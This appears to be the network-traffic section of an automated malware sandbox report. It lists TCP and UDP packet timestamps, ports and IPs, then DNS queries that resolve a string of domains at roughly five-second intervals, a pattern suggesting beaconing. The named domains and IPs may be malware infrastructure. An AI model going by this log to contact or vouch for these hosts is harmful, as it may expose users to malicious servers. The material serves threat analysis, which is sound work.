Mar 29, 2021 13:58:30.258023024 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258073092 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258089066 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258135080 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258192062 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258193016 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258249044 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258290052 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258339882 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258356094 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258388042 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258497000 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258514881 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258557081 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258577108 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258661032 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258677959 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258718967 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258740902 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258769989 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258790016 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.258830070 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.258848906 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.259032965 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.259057045 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.259094954 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.259113073 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392095089 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392121077 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392137051 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392148972 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392164946 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392179966 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392216921 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392215014 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392246008 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392266035 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392272949 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392277956 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392293930 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392462015 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392482042 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392494917 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392520905 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392524004 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392539024 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392589092 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392616034 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392632961 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392669916 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392693043 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392739058 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392757893 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392769098 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392786980 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.392805099 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392822027 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392848015 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.392971992 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393013954 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393043995 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393060923 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393136978 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393155098 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393192053 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393208027 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393294096 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393341064 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393348932 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393395901 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393451929 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393508911 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393512964 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393526077 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393542051 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393573046 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393596888 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393695116 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393712997 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393750906 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393774986 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393877983 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393896103 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.393932104 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.393949032 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394058943 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394094944 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394115925 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394138098 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394162893 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394179106 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394218922 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394234896 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394257069 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394273996 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394298077 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394364119 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394418001 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394418955 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394473076 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394571066 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394588947 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394623995 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394642115 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394740105 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394768000 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394783974 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394799948 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394813061 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394824982 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394845009 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394866943 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.394937992 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394964933 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.394994974 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.395008087 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.395020962 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.395039082 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.395071030 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.395087004 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.395184040 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.395231009 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.395240068 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.395247936 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.395262003 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:30.395283937 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:30.395301104 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:33.817035913 CEST	80	49712	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:33.817167044 CEST	49712	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:34.272427082 CEST	80	49713	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:34.272541046 CEST	49713	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:35.262137890 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:35.262252092 CEST	443	49714	170.249.199.106	192.168.2.3
Mar 29, 2021 13:58:35.262434959 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:35.262492895 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:51.477479935 CEST	49712	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:51.477565050 CEST	49713	80	192.168.2.3	170.249.199.106
Mar 29, 2021 13:58:51.480047941 CEST	49714	443	192.168.2.3	170.249.199.106
Mar 29, 2021 13:59:15.885437012 CEST	49734	80	192.168.2.3	34.102.136.180
Mar 29, 2021 13:59:15.923780918 CEST	80	49734	34.102.136.180	192.168.2.3
Mar 29, 2021 13:59:15.923927069 CEST	49734	80	192.168.2.3	34.102.136.180
Mar 29, 2021 13:59:15.924201012 CEST	49734	80	192.168.2.3	34.102.136.180
Mar 29, 2021 13:59:15.962351084 CEST	80	49734	34.102.136.180	192.168.2.3
Mar 29, 2021 13:59:16.123061895 CEST	80	49734	34.102.136.180	192.168.2.3
Mar 29, 2021 13:59:16.123104095 CEST	80	49734	34.102.136.180	192.168.2.3
Mar 29, 2021 13:59:16.126720905 CEST	49734	80	192.168.2.3	34.102.136.180
Mar 29, 2021 13:59:16.126761913 CEST	49734	80	192.168.2.3	34.102.136.180
Mar 29, 2021 13:59:16.165119886 CEST	80	49734	34.102.136.180	192.168.2.3
Mar 29, 2021 13:59:26.612854958 CEST	49735	80	192.168.2.3	198.54.117.218
Mar 29, 2021 13:59:26.800786972 CEST	80	49735	198.54.117.218	192.168.2.3
Mar 29, 2021 13:59:26.801042080 CEST	49735	80	192.168.2.3	198.54.117.218
Mar 29, 2021 13:59:26.801275015 CEST	49735	80	192.168.2.3	198.54.117.218
Mar 29, 2021 13:59:26.990271091 CEST	80	49735	198.54.117.218	192.168.2.3
Mar 29, 2021 13:59:26.990295887 CEST	80	49735	198.54.117.218	192.168.2.3
Mar 29, 2021 13:59:37.700342894 CEST	49737	80	192.168.2.3	35.246.6.109
Mar 29, 2021 13:59:37.758630037 CEST	80	49737	35.246.6.109	192.168.2.3
Mar 29, 2021 13:59:37.758785009 CEST	49737	80	192.168.2.3	35.246.6.109
Mar 29, 2021 13:59:37.759048939 CEST	49737	80	192.168.2.3	35.246.6.109
Mar 29, 2021 13:59:37.818310976 CEST	80	49737	35.246.6.109	192.168.2.3
Mar 29, 2021 13:59:37.861877918 CEST	80	49737	35.246.6.109	192.168.2.3
Mar 29, 2021 13:59:37.861911058 CEST	80	49737	35.246.6.109	192.168.2.3
Mar 29, 2021 13:59:37.862082005 CEST	49737	80	192.168.2.3	35.246.6.109
Mar 29, 2021 13:59:37.862133026 CEST	49737	80	192.168.2.3	35.246.6.109
Mar 29, 2021 13:59:37.920463085 CEST	80	49737	35.246.6.109	192.168.2.3
Mar 29, 2021 13:59:42.937061071 CEST	49738	80	192.168.2.3	217.160.0.233
Mar 29, 2021 13:59:42.981277943 CEST	80	49738	217.160.0.233	192.168.2.3
Mar 29, 2021 13:59:42.981370926 CEST	49738	80	192.168.2.3	217.160.0.233
Mar 29, 2021 13:59:42.981523991 CEST	49738	80	192.168.2.3	217.160.0.233
Mar 29, 2021 13:59:43.026187897 CEST	80	49738	217.160.0.233	192.168.2.3
Mar 29, 2021 13:59:43.026885033 CEST	80	49738	217.160.0.233	192.168.2.3
Mar 29, 2021 13:59:43.026913881 CEST	80	49738	217.160.0.233	192.168.2.3
Mar 29, 2021 13:59:43.027049065 CEST	49738	80	192.168.2.3	217.160.0.233
Mar 29, 2021 13:59:43.027121067 CEST	49738	80	192.168.2.3	217.160.0.233
Mar 29, 2021 13:59:43.071300030 CEST	80	49738	217.160.0.233	192.168.2.3
Mar 29, 2021 13:59:48.233880043 CEST	49741	80	192.168.2.3	66.96.160.133
Mar 29, 2021 13:59:48.359827995 CEST	80	49741	66.96.160.133	192.168.2.3
Mar 29, 2021 13:59:48.359930992 CEST	49741	80	192.168.2.3	66.96.160.133
Mar 29, 2021 13:59:48.360106945 CEST	49741	80	192.168.2.3	66.96.160.133
Mar 29, 2021 13:59:48.486089945 CEST	80	49741	66.96.160.133	192.168.2.3
Mar 29, 2021 13:59:48.489104986 CEST	80	49741	66.96.160.133	192.168.2.3
Mar 29, 2021 13:59:48.489152908 CEST	80	49741	66.96.160.133	192.168.2.3
Mar 29, 2021 13:59:48.489373922 CEST	49741	80	192.168.2.3	66.96.160.133
Mar 29, 2021 13:59:48.489461899 CEST	49741	80	192.168.2.3	66.96.160.133
Mar 29, 2021 13:59:48.615468025 CEST	80	49741	66.96.160.133	192.168.2.3
Mar 29, 2021 13:59:53.581844091 CEST	49742	80	192.168.2.3	23.227.38.32
Mar 29, 2021 13:59:53.620551109 CEST	80	49742	23.227.38.32	192.168.2.3
Mar 29, 2021 13:59:53.620762110 CEST	49742	80	192.168.2.3	23.227.38.32
Mar 29, 2021 13:59:53.620903015 CEST	49742	80	192.168.2.3	23.227.38.32
Mar 29, 2021 13:59:53.660444021 CEST	80	49742	23.227.38.32	192.168.2.3
Mar 29, 2021 13:59:53.792627096 CEST	80	49742	23.227.38.32	192.168.2.3
Mar 29, 2021 13:59:53.792691946 CEST	80	49742	23.227.38.32	192.168.2.3
Mar 29, 2021 13:59:53.792754889 CEST	80	49742	23.227.38.32	192.168.2.3
Mar 29, 2021 13:59:53.792814016 CEST	80	49742	23.227.38.32	192.168.2.3
Mar 29, 2021 13:59:53.792861938 CEST	80	49742	23.227.38.32	192.168.2.3
Mar 29, 2021 13:59:53.792887926 CEST	49742	80	192.168.2.3	23.227.38.32
Mar 29, 2021 13:59:53.792927980 CEST	49742	80	192.168.2.3	23.227.38.32
Mar 29, 2021 13:59:53.792943001 CEST	49742	80	192.168.2.3	23.227.38.32
Mar 29, 2021 13:59:53.792948961 CEST	49742	80	192.168.2.3	23.227.38.32
Mar 29, 2021 13:59:53.792967081 CEST	80	49742	23.227.38.32	192.168.2.3
Mar 29, 2021 13:59:53.793037891 CEST	49742	80	192.168.2.3	23.227.38.32
Mar 29, 2021 14:00:09.134834051 CEST	49743	80	192.168.2.3	34.102.136.180
Mar 29, 2021 14:00:09.173060894 CEST	80	49743	34.102.136.180	192.168.2.3
Mar 29, 2021 14:00:09.173235893 CEST	49743	80	192.168.2.3	34.102.136.180
Mar 29, 2021 14:00:09.173280001 CEST	49743	80	192.168.2.3	34.102.136.180
Mar 29, 2021 14:00:09.211540937 CEST	80	49743	34.102.136.180	192.168.2.3
Mar 29, 2021 14:00:09.372026920 CEST	80	49743	34.102.136.180	192.168.2.3
Mar 29, 2021 14:00:09.372081041 CEST	80	49743	34.102.136.180	192.168.2.3
Mar 29, 2021 14:00:09.372257948 CEST	49743	80	192.168.2.3	34.102.136.180
Mar 29, 2021 14:00:09.372299910 CEST	49743	80	192.168.2.3	34.102.136.180
Mar 29, 2021 14:00:09.410566092 CEST	80	49743	34.102.136.180	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2021 13:58:03.306735039 CEST	50200	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:03.352776051 CEST	53	50200	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:04.082914114 CEST	51281	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:04.132050037 CEST	53	51281	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:04.998243093 CEST	49199	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:05.047425985 CEST	53	49199	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:05.763973951 CEST	50620	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:05.809840918 CEST	53	50620	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:06.584971905 CEST	64938	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:06.633824110 CEST	53	64938	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:07.366197109 CEST	60152	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:07.413595915 CEST	53	60152	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:08.147408962 CEST	57544	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:08.209928036 CEST	53	57544	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:09.131398916 CEST	55984	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:09.180187941 CEST	53	55984	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:09.940485954 CEST	64185	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:09.986318111 CEST	53	64185	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:15.098123074 CEST	65110	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:15.145654917 CEST	53	65110	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:25.582076073 CEST	58361	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:25.628344059 CEST	53	58361	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:26.644798040 CEST	63492	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:26.690715075 CEST	53	63492	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:27.612477064 CEST	60831	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:27.671569109 CEST	53	60831	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:27.860575914 CEST	60100	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:27.906409979 CEST	53	60100	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:28.343625069 CEST	53195	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:28.516680956 CEST	53	53195	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:28.821455002 CEST	50141	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:28.991142035 CEST	53	50141	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:29.466384888 CEST	53023	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:29.519741058 CEST	53	53023	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:31.563354969 CEST	49563	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:31.609754086 CEST	53	49563	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:33.293075085 CEST	51352	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:33.341991901 CEST	53	51352	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:33.966454983 CEST	59349	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:34.022157907 CEST	53	59349	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:43.042294025 CEST	57084	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:43.088284016 CEST	53	57084	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:44.142561913 CEST	58823	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:44.193439960 CEST	53	58823	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:45.353490114 CEST	57568	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:45.399928093 CEST	53	57568	8.8.8.8	192.168.2.3
Mar 29, 2021 13:58:45.457151890 CEST	50540	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:58:45.514496088 CEST	53	50540	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:10.096434116 CEST	54366	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:10.145376921 CEST	53	54366	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:10.315231085 CEST	53034	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:10.361108065 CEST	53	53034	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:10.780493975 CEST	57762	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:10.826448917 CEST	53	57762	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:14.059994936 CEST	55435	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:14.115717888 CEST	53	55435	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:15.812453032 CEST	50713	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:15.880345106 CEST	53	50713	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:21.130537033 CEST	56132	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:21.452011108 CEST	53	56132	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:26.464684963 CEST	58987	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:26.610491037 CEST	53	58987	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:32.034113884 CEST	56579	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:32.202716112 CEST	53	56579	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:37.574982882 CEST	60633	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:37.686423063 CEST	53	60633	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:42.869838953 CEST	61292	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:42.936120987 CEST	53	61292	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:45.327696085 CEST	63619	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:45.373949051 CEST	53	63619	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:46.420058966 CEST	64938	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:46.491791964 CEST	53	64938	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:48.076154947 CEST	61946	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:48.231761932 CEST	53	61946	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:53.513850927 CEST	64910	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:53.579756021 CEST	53	64910	8.8.8.8	192.168.2.3
Mar 29, 2021 13:59:58.811161041 CEST	52123	53	192.168.2.3	8.8.8.8
Mar 29, 2021 13:59:58.890744925 CEST	53	52123	8.8.8.8	192.168.2.3
Mar 29, 2021 14:00:03.900238037 CEST	56130	53	192.168.2.3	8.8.8.8
Mar 29, 2021 14:00:04.060530901 CEST	53	56130	8.8.8.8	192.168.2.3
Mar 29, 2021 14:00:09.069717884 CEST	56338	53	192.168.2.3	8.8.8.8
Mar 29, 2021 14:00:09.134391069 CEST	53	56338	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 29, 2021 13:58:28.343625069 CEST	192.168.2.3	8.8.8.8	0xbb4d	Standard query (0)	aps-mm.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:58:28.821455002 CEST	192.168.2.3	8.8.8.8	0xa416	Standard query (0)	www.aps-mm.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:15.812453032 CEST	192.168.2.3	8.8.8.8	0x1584	Standard query (0)	www.plowbrothers.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:21.130537033 CEST	192.168.2.3	8.8.8.8	0x43a	Standard query (0)	www.slutefuter.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:26.464684963 CEST	192.168.2.3	8.8.8.8	0x77dc	Standard query (0)	www.loversdeal.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:32.034113884 CEST	192.168.2.3	8.8.8.8	0xd2ca	Standard query (0)	www.booksfall.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:37.574982882 CEST	192.168.2.3	8.8.8.8	0x8448	Standard query (0)	www.pcpartout.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:42.869838953 CEST	192.168.2.3	8.8.8.8	0xd02a	Standard query (0)	www.birkenhof-allgaeu.net	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:48.076154947 CEST	192.168.2.3	8.8.8.8	0x1385	Standard query (0)	www.choupisson.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:53.513850927 CEST	192.168.2.3	8.8.8.8	0x4e8a	Standard query (0)	www.uforservice.com	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:58.811161041 CEST	192.168.2.3	8.8.8.8	0x2170	Standard query (0)	www.domennyarendi39.net	A (IP address)	IN (0x0001)
Mar 29, 2021 14:00:03.900238037 CEST	192.168.2.3	8.8.8.8	0x184f	Standard query (0)	www.accinf5.com	A (IP address)	IN (0x0001)
Mar 29, 2021 14:00:09.069717884 CEST	192.168.2.3	8.8.8.8	0xdb28	Standard query (0)	www.silverdollarcafe.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Mar 29, 2021 13:58:28.516680956 CEST	8.8.8.8	192.168.2.3	0xbb4d	No error (0)	aps-mm.com		170.249.199.106	A (IP address)	IN (0x0001)
Mar 29, 2021 13:58:28.991142035 CEST	8.8.8.8	192.168.2.3	0xa416	No error (0)	www.aps-mm.com	aps-mm.com		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:58:28.991142035 CEST	8.8.8.8	192.168.2.3	0xa416	No error (0)	aps-mm.com		170.249.199.106	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:10.145376921 CEST	8.8.8.8	192.168.2.3	0x552a	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:15.880345106 CEST	8.8.8.8	192.168.2.3	0x1584	No error (0)	www.plowbrothers.com	plowbrothers.com		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:15.880345106 CEST	8.8.8.8	192.168.2.3	0x1584	No error (0)	plowbrothers.com		34.102.136.180	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:21.452011108 CEST	8.8.8.8	192.168.2.3	0x43a	Server failure (2)	www.slutefuter.com	none	none	A (IP address)	IN (0x0001)
